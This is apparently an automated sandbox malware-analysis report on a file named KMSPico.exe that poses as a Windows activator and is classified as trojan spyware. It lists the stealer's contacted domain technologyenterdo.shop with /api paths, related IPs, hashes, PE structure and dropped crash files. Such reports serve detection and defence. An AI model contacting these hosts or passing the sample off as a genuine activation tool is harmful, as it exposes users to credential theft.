                    http://crl.rootca1.amazontrust.com/rootca1.crl0KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://upx.sf.netAmcache.hve.4.drfalse
                      high
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://ocsp.rootca1.amazontrust.com0:KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.ecosia.org/newtab/KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ac.ecosia.org/autocomplete?q=KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://technologyenterdo.shop/JKMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://x1.c.lencr.org/0KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://x1.i.lencr.org/0KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://crt.rootca1.amazontrust.com/rootca1.cer0?KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://technologyenterdo.shop/apisKMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 14%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://technologyenterdo.shop/yKMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 15%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://support.mozilla.org/products/firefoxgro.allKMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://technologyenterdo.shop/KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 15%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://technologyenterdo.shop/?KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://technologyenterdo.shop/apik4KMSPico.exe, 00000000.00000003.2090458724.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2082443424.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.80.118
                                    technologyenterdo.shopUnited States
                                    13335CLOUDFLARENETUStrue
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1400640
                                    Start date and time:2024-02-29 01:47:03 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 32s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:KMSPico.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@2/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target KMSPico.exe, PID 3648 because there are no executed function
                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    01:47:52API Interceptor8x Sleep call for process: KMSPico.exe modified
                                    01:48:16API Interceptor1x Sleep call for process: WerFault.exe modified
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    technologyenterdo.shopBr3u0QVhyZ.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.180.132
                                    sE76IBM72M.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog StealerBrowse
                                    • 172.67.180.132
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://28febmich14.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                    • 172.67.38.66
                                    https://m-facebookz2b.gxscv.com/vhsfhqpdhdsih6/Get hashmaliciousUnknownBrowse
                                    • 172.67.140.176
                                    https://web-mail-attaccount-ver005115.weeblysite.com/IP:Get hashmaliciousUnknownBrowse
                                    • 162.159.136.66
                                    https://privatedetectivesa.co.za/images/foot/jhvjh/lGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.2.184
                                    https://kembaliketarifnormal-6500bni.pages.dev/IP:Get hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    https://amkiyuerbxl89s5ykhzkggyspw8igsactb.pages.dev/smart89/IP:Get hashmaliciousUnknownBrowse
                                    • 172.66.44.150
                                    https://rzowbflicpqjmxky.z13.web.core.windows.net/?bcda=1-888-632-0151IP:Get hashmaliciousTechSupportScamBrowse
                                    • 104.21.41.125
                                    sharepoint-docusign009_message.htmlGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    http://kembaliketarifnormal-6-500bnl.gadismanis4.com/IP:Get hashmaliciousUnknownBrowse
                                    • 172.67.184.155
                                    https://shorturl.at/jlpEOGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                    • 104.17.2.184
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    a0e9f5d64349fb13191bc781f81f42e1scan-28-02-24_6806.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scan-28-02-24_4822.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_3315.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_2499.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_9290.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_9631.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_1662.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_4864.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_7261.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    scanned_doc#2024-27-2_9336.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.80.118
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.9820825137729422
                                    Encrypted:false
                                    SSDEEP:96:6TSeREou+Eszx1Yzjv9fDUQXIDcQNc67cElcw38N+HbHg/8BRTf3o8Fa9SAOyPut:sdyv+EVb0D/fTjtdFDzuiFUZ24IO8ym
                                    MD5:0EC54C15C30E2F00A1B3275E5F6A7FE3
                                    SHA1:B28EC411DD0AA3CD7BCB65931B7DC8C0DA0C2AF2
                                    SHA-256:4870FEE31EF70A6B9B6145E7662D3684366CBF661CD39862D699818AFC96133A
                                    SHA-512:18605ADD00FF7616C80281C538FD496E436F504D5F9B136B8F420961FB64C658677AAEEE777189534D60D68E961F046C54EE5BCE4351586967A6CCC682A11CC5
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.3.6.4.1.2.8.3.5.8.7.3.5.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.3.6.4.1.2.8.5.6.3.4.2.2.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.9.c.c.a.b.6.-.5.3.c.c.-.4.d.3.8.-.b.1.a.e.-.4.0.2.0.0.a.3.8.6.9.b.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.9.d.5.c.f.e.-.f.8.0.0.-.4.6.5.c.-.9.3.9.b.-.0.d.f.9.7.d.4.d.2.d.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.K.M.S.P.i.c.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.0.-.0.0.0.1.-.0.0.1.4.-.9.5.8.6.-.8.9.e.a.a.8.6.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.8.0.2.5.b.3.2.a.5.7.4.9.8.b.4.d.4.9.b.1.7.8.0.9.b.0.3.a.c.d.c.0.0.0.0.9.c.1.4.!.0.0.0.0.c.7.a.d.e.6.1.2.e.6.0.5.3.c.7.6.5.2.6.9.8.d.4.3.1.f.5.9.c.7.e.d.4.3.a.5.7.f.1.9.!.K.M.S.P.i.c.o...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Thu Feb 29 00:48:05 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):51830
                                    Entropy (8bit):2.869063610021232
                                    Encrypted:false
                                    SSDEEP:192:eRMZXXBiLwIG0OLBcP6P64R4tw6PUaJvjU54zPOFQLygtnJGIzs4RtpjUMeqH9+Z:AGBiLwLLBPP6tGMoefLttJGS5tpjqqQZ
                                    MD5:F3DF7807CE9A3F051B810AFCA10AADE9
                                    SHA1:28CFF110D497D21340950B286FDB30B26A33C1EE
                                    SHA-256:4C4C73B30CCCA65563BDB08003EF62E6D26F4152833A941004C74E1E83FEF3FA
                                    SHA-512:DB75936DAD993A483B5C58CB3130137A23BAC374BC900FC808BD2FAB04FD10EBFFFBD31843F8FA83211EDEF64E89F10DA9F58BF76B441BD5920D32A6767179AD
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......E..e............4...........8...H.......,...............J0..........`.......8...........T...........(=..N........................!..............................................................................eJ......0"......GenuineIntel............T.......@...4..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8320
                                    Entropy (8bit):3.697692850713784
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJYA61Ab6YEICSULz4gmfvj4+pDv89bePsfpKm:R6lXJn6126YE9SUn4gmfL4De0fl
                                    MD5:1FBB925EBADE91DD96876474E4D152C3
                                    SHA1:3290B09A41DF8D5611CD2F21E0B1C3AE6C05B89B
                                    SHA-256:9EBD112BEDA7FF06D28D1FE9DFA3EBDF1EC0F392B211482BF7B3171DDBD1D273
                                    SHA-512:50903F0EE54437047BA3FF7CFF7461A48924247178F231DCBD0F345AA0C6FD60A58FAD358ACB72BF13E8E13D833E7D3DB6A6FAF4A5B820807F4B743A52AD1B1E
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.8.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4562
                                    Entropy (8bit):4.459653068252717
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsEJg77aI9SNWpW8VYpYm8M4JvtFjnm+q8gZTwiuId:uIjfCI7I87V1JjnmrUiuId
                                    MD5:CA370F97A001C5D25982C9D2103B80EF
                                    SHA1:DACE386F84188F0BCCACB3C506EAA8CE176CE59F
                                    SHA-256:696D69EBA6D53A9085A29D552C1EDC19C39D87A0D246F8B523C74267BFFD4841
                                    SHA-512:0616A6112C975400BE8C334B8AF4468D93B2A1EE129F9B386D3F4D5E5DDF6001C5480A88072047D2C82B0FDBBF7E976F08C919CB9391159769F936897C209907
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="214070" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.421508203105066
                                    Encrypted:false
                                    SSDEEP:6144:MSvfpi6ceLP/9skLmb0OT5WSPHaJG8nAgeMZMMhA2fX4WABlEnN10uhiTw:3vloT5W+EZMM6DFyL03w
                                    MD5:CD9476B23A8101AF09D3290D696821C5
                                    SHA1:B92CFB4957BA1D4DEE99B3829ADD53348849906E
                                    SHA-256:9B101C94834BE91D6F449086D25B16E6509D92AFFBADBE28E4318FA4D95644BE
                                    SHA-512:6EAFC2CF1CB88A79CDB7BBFC17CB57ABD00313F00A6AE50FBF087498B22B6D311FE5CB11AA2E7A945AF85075DE59E6FB48129F39E9EF5E3B024AA5C5D4349913
                                    Malicious:false
                                    Reputation:low
                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...j...............................................................................................................................................................................................................................................................................................................................................}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.331170903296359
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:KMSPico.exe
                                    File size:287'744 bytes
                                    MD5:e46fcde17771922059b7a826ec4e4ca3
                                    SHA1:c7ade612e6053c7652698d431f59c7ed43a57f19
                                    SHA256:e2e733137df2e1a7d726335f8ae4d1b4ce83ef2d1d3db2651c23db1a24c918f0
                                    SHA512:e510e2d16920e077dc55da1c20a176d8a7147c28ca828635f8c6c5ad0083f6b64c4b794ec4c4c7408f1cbfc65fcf6744f7ce8cef9ee9b90e57c630ca7a8cd1d1
                                    SSDEEP:6144:1Y3DCZutB4lBjV9d1aZJzuQSoXCbreMbi5N7R397:1Y2Zuf4lf3kJzu9oX8LiP7
                                    TLSH:2E54F02633D0C839D4A621319862DBB54A7BFCA12D35858B77A03B3F9E212C19A3575A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................M.......x.......L.......u...............I.......|.......{.....Rich............PE..L...WI.d...................
                                    Icon Hash:1319712306413347
                                    Entrypoint:0x401637
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x64F24957 [Fri Sep 1 20:28:07 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:3e9a9cf66c4a31d33ef1279b5d62e5f6
                                    Instruction
                                    call 00007F4608C11B56h
                                    jmp 00007F4608C0E9BEh
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov dword ptr [00440258h], eax
                                    mov dword ptr [00440254h], ecx
                                    mov dword ptr [00440250h], edx
                                    mov dword ptr [0044024Ch], ebx
                                    mov dword ptr [00440248h], esi
                                    mov dword ptr [00440244h], edi
                                    mov word ptr [00440270h], ss
                                    mov word ptr [00440264h], cs
                                    mov word ptr [00440240h], ds
                                    mov word ptr [0044023Ch], es
                                    mov word ptr [00440238h], fs
                                    mov word ptr [00440234h], gs
                                    pushfd
                                    pop dword ptr [00440268h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [0044025Ch], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00440260h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [0044026Ch], eax
                                    mov eax, dword ptr [ebp-00000320h]
                                    mov dword ptr [004401A8h], 00010001h
                                    mov eax, dword ptr [00440260h]
                                    mov dword ptr [0044015Ch], eax
                                    mov dword ptr [00440150h], C0000409h
                                    mov dword ptr [00440154h], 00000001h
                                    mov eax, dword ptr [0043E004h]
                                    mov dword ptr [ebp-00000328h], eax
                                    mov eax, dword ptr [0043E008h]
                                    mov dword ptr [ebp-00000324h], eax
                                    call dword ptr [000000CCh]
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [IMP] VS2008 SP1 build 30729
                                    • [RES] VS2010 build 30319
                                    • [LNK] VS2010 build 30319
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3d25c0x78.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ee70000x75c8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x19c.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x3916b0x392005877f4d9d3d75f2d0e68f955c984cda7False0.8708971553610503data7.7446509642308685IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x3b0000x2bd00x2c00791bfb0d303e561e778d755e2ed7cd98False0.36665482954545453data4.969085311343728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x3e0000x1ea812c0x2c00b313328d111fa566ef4c77fbed6c84c2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1ee70000x75c80x76000fcca62874bb692c787b19fb33d7b772False0.5990466101694916data5.31913405116205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_CURSOR0x1eecbc80x130Device independent bitmap graphic, 32 x 64 x 1, image size 0EnglishUnited States0.4276315789473684
                                    RT_CURSOR0x1eecd100x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.75
                                    RT_CURSOR0x1eece600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.31023454157782515
                                    RT_ICON0x1ee74200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.69136460554371
                                    RT_ICON0x1ee82c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7292418772563177
                                    RT_ICON0x1ee8b700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.6394009216589862
                                    RT_ICON0x1ee92380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5852601156069365
                                    RT_ICON0x1ee97a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.6434647302904565
                                    RT_ICON0x1eebd480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.7553278688524591
                                    RT_ICON0x1eec6d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.8351063829787234
                                    RT_STRING0x1eeded80xe0dataEnglishUnited States0.5491071428571429
                                    RT_STRING0x1eedfb80x610dataEnglishUnited States0.43427835051546393
                                    RT_ACCELERATOR0x1eecba00x28dataEnglishUnited States1.0
                                    RT_GROUP_CURSOR0x1eeccf80x14dataEnglishUnited States1.15
                                    RT_GROUP_CURSOR0x1eece480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                    RT_GROUP_CURSOR0x1eedd080x14dataEnglishUnited States1.25
                                    RT_GROUP_ICON0x1eecb380x68dataEnglishUnited States0.7115384615384616
                                    RT_VERSION0x1eedd200x1b4dataEnglishUnited States0.573394495412844
                                    DLLImport
                                    KERNEL32.dllHeapAlloc, SystemTimeToFileTime, GetUserDefaultLCID, WideCharToMultiByte, GetConsoleAliasExesLengthW, GetTimeZoneInformation, ReleaseSemaphore, ReplaceFileA, GetStdHandle, GetCurrentDirectoryW, SetLastError, CreateNamedPipeA, CreateTimerQueueTimer, BuildCommDCBW, LoadLibraryA, SystemTimeToTzSpecificLocalTime, LocalAlloc, GetFileType, AddAtomW, GetModuleFileNameA, lstrcatW, FreeEnvironmentStringsW, VirtualProtect, FatalAppExitA, EndUpdateResourceA, GetVolumeInformationW, CreateFileW, WriteConsoleW, ReadFile, GetProcessHeap, GetLocaleInfoA, MoveFileExA, InterlockedExchangeAdd, WriteConsoleOutputCharacterW, SetEndOfFile, SetStdHandle, GetLastError, HeapFree, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, HeapCreate, Sleep, HeapSize, GetProcAddress, GetModuleHandleW, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, RtlUnwind, WriteFile, GetModuleFileNameW, GetEnvironmentStringsW, SetHandleCount, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, 